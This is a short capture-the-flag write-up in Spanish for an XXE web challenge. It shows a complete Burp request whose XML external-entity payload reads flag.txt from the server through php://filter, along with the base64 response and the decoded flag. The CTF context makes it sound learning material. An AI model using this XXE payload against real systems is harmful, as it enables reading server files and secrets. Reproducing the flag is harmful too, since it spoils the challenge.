# Out Christimas Wishlist (web, 50p, 270 solved)

> We have all gathered round to write down our wishes and desires for this 
> Christmas! Please don't write anything mean, Santa will be reading this!
> 
> Server: http://199.247.6.180:12001

La URL muestra un campo para escribir texto y un boton de enviar. Es un reto 
de seguridad web.

Tras mucho leer y probar, resulta que la web tiene una vuln XXE que permite 
extraer el contenido de ficheros del servidor que corre la app, jugando con 
las estructuras XML mal saneadas.

Desde Burp Suite, se realiza la peticion siguiente, que devuelve el fichero 
flag.txt en base64:

```
REQUEST

POST / HTTP/1.1
Host: 95.179.163.167:12001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://95.179.163.167:12001/
Content-Type: application/xml
Content-Length: 182
Cookie: PHPSESSID=
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/flag.txt"> ]>
<message>&xxe;</message>
```

```
RESPONSE

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Dec 2018 22:53:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.10
Set-Cookie: PHPSESSID=00081383b51068a2d5d5fe0f61e1ad9c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 99

Your wish: WC1NQVN7X1RoZV9FeDczcm5hbF9FbnQxdDEzJF9XNG43X1RvX19KbzFuXzdoZV9wNHI3eV9fNzAwX19fX19ffQo=
```

Que decodificado se obtiene la flag X-MAS{_The_Ex73rnal_Ent1t13$_W4n7_To__Jo1n_7he_p4r7y__700______}

Checked!

Solucion: X-MAS{_The_Ex73rnal_Ent1t13$_W4n7_To__Jo1n_7he_p4r7y__700______}



